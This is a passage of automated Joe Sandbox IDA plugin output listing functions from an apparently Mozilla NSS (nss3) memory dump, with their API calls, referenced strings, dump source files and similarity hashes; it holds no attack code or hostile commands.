EnterCriticalSection.KERNEL32(?), ref: 6C79109B
PR_Unlock.NSS3(?), ref: 6C7910B8
free.MOZGLUE(?), ref: 6C791113
PORT_Alloc_Util.NSS3(?), ref: 6C791151
free.MOZGLUE(?), ref: 6C7911AB
TlsGetValue.KERNEL32 ref: 6C791296
EnterCriticalSection.KERNEL32(?), ref: 6C7912AB
PR_Unlock.NSS3(?), ref: 6C7912D9
TlsGetValue.KERNEL32 ref: 6C7912F4
EnterCriticalSection.KERNEL32(?), ref: 6C79130C
PR_Unlock.NSS3(?), ref: 6C791340
TlsGetValue.KERNEL32 ref: 6C791354
EnterCriticalSection.KERNEL32(?), ref: 6C79136C
PR_Unlock.NSS3(?), ref: 6C7913A3
TlsGetValue.KERNEL32 ref: 6C7913BA
EnterCriticalSection.KERNEL32(?), ref: 6C7913CF
PR_Unlock.NSS3(?), ref: 6C7913FB

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

PR_SetError.NSS3(FFFFE040,00000000), ref: 6C79141E

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

/G6/, xrefs: 6C7909BC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalSection$Enter$Errorfree$Alloc_Utilcalloc$Leavememcpymemset
String ID: /G6/
API String ID: 3136013483-570549270
Opcode ID: 3e1eda47fe760ec7f340730e95fcc04d4b0370cf32bcf39cdacdc2a1e813cdd8
Instruction ID: 475ce067765be5ddf00016fef85fbe0b467a3ede728d11b9cc30e4eb2d00b6a1
Opcode Fuzzy Hash: 3e1eda47fe760ec7f340730e95fcc04d4b0370cf32bcf39cdacdc2a1e813cdd8
Instruction Fuzzy Hash: D672DF72D002549FEF109F64E98879A7BB4BF0A318F0805B9DC099B752E734A995CBD1

Function 6C7A4840 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 351
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C78601B,?,00000000,?), ref: 6C7A486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7A48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7A48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7A48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7A48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C7A490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C7A4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C7A493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A4970
PORT_Alloc_Util.NSS3(00000001), ref: 6C7A49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7A49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7A49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C7A4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C7A4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C7A4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C7A4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C7A4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C7A4A81
free.MOZGLUE(00000000), ref: 6C7A4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7A4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C7A4ADC
free.MOZGLUE(00000000), ref: 6C7A4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7A4B33

Part of subcall function 6C7A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7A413D
Part of subcall function 6C7A4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7A4162
Part of subcall function 6C7A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7A416B
Part of subcall function 6C7A4120: PL_strncasecmp.NSS3(2Bzl,?,00000001), ref: 6C7A4187
Part of subcall function 6C7A4120: NSSUTIL_ArgSkipParameter.NSS3(2Bzl), ref: 6C7A41A0
Part of subcall function 6C7A4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7A41B4
Part of subcall function 6C7A4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7A41CC
Part of subcall function 6C7A4120: NSSUTIL_ArgFetchValue.NSS3(2Bzl,?), ref: 6C7A4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C7A4B53
free.MOZGLUE(00000000), ref: 6C7A4B94
free.MOZGLUE(?), ref: 6C7A4BA7
free.MOZGLUE(00000000), ref: 6C7A4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A4BC8

Strings

every, xrefs: 6C7A4A66
hasRootCerts, xrefs: 6C7A4AD6
/G6/, xrefs: 6C7A484F
hasRootTrust, xrefs: 6C7A4B4D
timeout, xrefs: 6C7A4A38, 6C7A4A7B
rootFlags, xrefs: 6C7A4AB9, 6C7A4B2E
askpw, xrefs: 6C7A4A4A
slotFlags, xrefs: 6C7A4A22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: /G6/$askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-2028680129
Opcode ID: a4828740edff59563b3c3b946f18d07b6ce7a9338c32321a27cc4cd4b912df5b
Instruction ID: b8c29896a27054a1efb9ec85cbcd337be0e2853e60c882d23a835f5df7a335c0
Opcode Fuzzy Hash: a4828740edff59563b3c3b946f18d07b6ce7a9338c32321a27cc4cd4b912df5b
Instruction Fuzzy Hash: 7BC128B0E052559FEB108FE89E447AE7BB8AF0630CF141638E845A3701EB23D916D7A5

Function 6C766D90 Relevance: 62.1, APIs: 33, Strings: 2, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C86A8EC,0000006C), ref: 6C766DC6
memcpy.VCRUNTIME140(?,6C86A958,0000006C), ref: 6C766DDB
memcpy.VCRUNTIME140(?,6C86A9C4,00000078), ref: 6C766DF1
memcpy.VCRUNTIME140(?,6C86AA3C,0000006C), ref: 6C766E06
memcpy.VCRUNTIME140(?,6C86AAA8,00000060), ref: 6C766E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C766E38

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C766E76
TlsGetValue.KERNEL32 ref: 6C76726F
EnterCriticalSection.KERNEL32(?), ref: 6C767283

Strings

!, xrefs: 6C767123
/G6/, xrefs: 6C766D9F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !$/G6/
API String ID: 3333340300-2983384458
Opcode ID: 1f21d68c128972a1782208f73653a3084b98a51704003d803576960e66821492
Instruction ID: ba01036a3f6ac4fc3c5be479d5fa5bd409676332592d44410e017cc67d857f47
Opcode Fuzzy Hash: 1f21d68c128972a1782208f73653a3084b98a51704003d803576960e66821492
Instruction Fuzzy Hash: 9A728E75D052199FDF60DF29CD8879ABBB5BF49308F1441A9D80DA7B01EB31AA84CF90

Function 6C788A30 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C788A58

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C788AC6
PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6C788ADF
SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6C788B19
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C788B2D
PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6C788B49
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6C788B61
SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6C788B83
SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6C788BA0
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C788BF0
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C788BF9
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C788C13
HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C788C3A
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C788CA7
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C788CC4
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C788D12
PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C788D20
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C788D40
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C788D99
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C788DBF
PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6C788DD5
SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6C86D864), ref: 6C788E39

Part of subcall function 6C79F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C79F0C8
Part of subcall function 6C79F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C79F122

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6C788E5B

Part of subcall function 6C79BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C74E708,00000000,00000000,00000004,00000000), ref: 6C79BE6A
Part of subcall function 6C79BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7504DC,?), ref: 6C79BE7E
Part of subcall function 6C79BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C79BEC2

SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C86D8C4), ref: 6C788E94
SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6C788EAC
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C788EBA
SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6C788ECC
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C788EE1
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C788EF4
free.MOZGLUE(00000000), ref: 6C788EFD
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C788F11
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C788F1C

Strings

tFVPj, xrefs: 6C788EC4
/G6/, xrefs: 6C788A3C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
String ID: /G6/$tFVPj
API String ID: 2709086113-1804686607
Opcode ID: f3c2b584c7fd6618eea0ddbd4bec1f44076540e54250972b6e3ff2e91e8492a5
Instruction ID: 9a61f5b7ba3d6f04edd52b60f25b70c5a55ce5697c8f59c04f232dc38a91d59a
Opcode Fuzzy Hash: f3c2b584c7fd6618eea0ddbd4bec1f44076540e54250972b6e3ff2e91e8492a5
Instruction Fuzzy Hash: 78D116B59063009BE7108F24DF89BAB77E8EF55308F14493AEE54C6A81F730D954C7A2

Function 6C7AAC30 Relevance: 47.8, APIs: 26, Strings: 1, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7AACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C7AACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C7AACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C7AAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7AADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7AADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7AADF0

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7AB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7AB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7AB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7AB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C7AB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7AB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7AB40C

Strings

/G6/, xrefs: 6C7AAC3F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID: /G6/
API String ID: 1285963562-570549270
Opcode ID: 33871f646ec49f4ae4ba9b3abbfac918f266ec7eb1aa4f71b065236d8b61ab10
Instruction ID: 72e90c2628e13ab09449bd7263132d0270611b7467a072104d8d0bf1f73aa02a
Opcode Fuzzy Hash: 33871f646ec49f4ae4ba9b3abbfac918f266ec7eb1aa4f71b065236d8b61ab10
Instruction Fuzzy Hash: 7422C071904300AFE710CF55CE49B9A77E1AF84318F24863CE8595B792E772E85ACB92

Function 6C77EA00 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 304COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C788C9F,00000000,00000000,?), ref: 6C77EA29

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C788C9F), ref: 6C77EB01
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C86C6C4), ref: 6C77EB28
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C77EBC6
SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C77EBDE
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77EBEB
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C788C9F), ref: 6C77EC17
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C77EC2F
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C77EC4B
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C86C754), ref: 6C77EC6D
free.MOZGLUE(?), ref: 6C77EC7F
free.MOZGLUE(00000000), ref: 6C77EC90
free.MOZGLUE(?), ref: 6C77ECA1
free.MOZGLUE(00000000), ref: 6C77ECBF
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C77ECD4
SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6C7891D5
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C7891E8
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7891F2
free.MOZGLUE(00000000), ref: 6C7891FB

Strings

/G6/, xrefs: 6C77EA1B, 6C78917C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
String ID: /G6/
API String ID: 899953378-570549270
Opcode ID: b33be2d55a2909959c4543e4d2231e61e3c2adc6e01d00fff38e159e4ec7f308
Instruction ID: d81b8f323e639a99d2335b1c54d2545712f02fdcd371468b18deae4a5a865d1f
Opcode Fuzzy Hash: b33be2d55a2909959c4543e4d2231e61e3c2adc6e01d00fff38e159e4ec7f308
Instruction Fuzzy Hash: F5A1D671A0120D5FEF20CA69DE84FFE7BA8EB45348F204439E816D7B91E621D954C7E2

Function 6C72ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C72ED38

Part of subcall function 6C6C4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C72EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C72EFE4

Part of subcall function 6C7EDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C6C5001,?,00000003,00000000), ref: 6C7EDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C72F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C72F129
sqlite3_mprintf.NSS3(optimize), ref: 6C72F1D1
sqlite3_free.NSS3(?), ref: 6C72F368

Strings

simple, xrefs: 6C72ED79
fts3tokenize, xrefs: 6C72F30F
optimize, xrefs: 6C72F199, 6C72F1CC, 6C72F211
matchinfo, xrefs: 6C72F04F, 6C72F082, 6C72F0C2, 6C72F0F2, 6C72F124, 6C72F169
offsets, xrefs: 6C72EFAF, 6C72EFDF, 6C72F01F
fts4, xrefs: 6C72F2AD
unicode61, xrefs: 6C72EDB5
fts3, xrefs: 6C72F247
snippet, xrefs: 6C72EF05, 6C72EF37, 6C72EF7C
fts4aux, xrefs: 6C72ECF9
porter, xrefs: 6C72ED97
fts3_tokenizer, xrefs: 6C72EE1A, 6C72EEA8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: c47ac2f1e46ed9d47554fdc5f682ea82b1df621885354911314f936c219b5257
Instruction ID: 5c6d755f6eab16fb1d81c09fd5d50aa4a2ebcb82ca37a1f33a86552acd913a04
Opcode Fuzzy Hash: c47ac2f1e46ed9d47554fdc5f682ea82b1df621885354911314f936c219b5257
Instruction Fuzzy Hash: 0702D2B1B043105BE7249E75AE8572F36B2BFC560CF14493CD85A87B02EB79E846C792

Function 6C7BC8C0 Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7BCA51
TlsGetValue.KERNEL32 ref: 6C7BCAE8
EnterCriticalSection.KERNEL32(?), ref: 6C7BCAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BCB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6C7BCB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6C7BCBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C7BCCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7BCCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6C7BCD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6C7BCD73
memcpy.VCRUNTIME140(?,?,?), ref: 6C7BCD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6C7BCDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C7BCE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7BCE17
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BCE24
PR_Unlock.NSS3 ref: 6C7BCE49
PK11_FreeSymKey.NSS3(00000000), ref: 6C7BCE96

Strings

/G6/, xrefs: 6C7BC8CF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID: /G6/
API String ID: 3685077037-570549270
Opcode ID: 37b1a827aa08100ad11de021e2f4bbbbf0b12d81f393ae77a94a7b890bee4f20
Instruction ID: 2435a4a58c51da6ceeeb39479388a17b7bdc2a970bd8e39cb1463d9b3dbf9e5f
Opcode Fuzzy Hash: 37b1a827aa08100ad11de021e2f4bbbbf0b12d81f393ae77a94a7b890bee4f20
Instruction Fuzzy Hash: 45F1E7B1D002148BEB10EF15CE847AA7774FF4531AF1480B9E909B7741E734DA94CB96

Function 6C7AEFF0 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 362memoryCOMMON

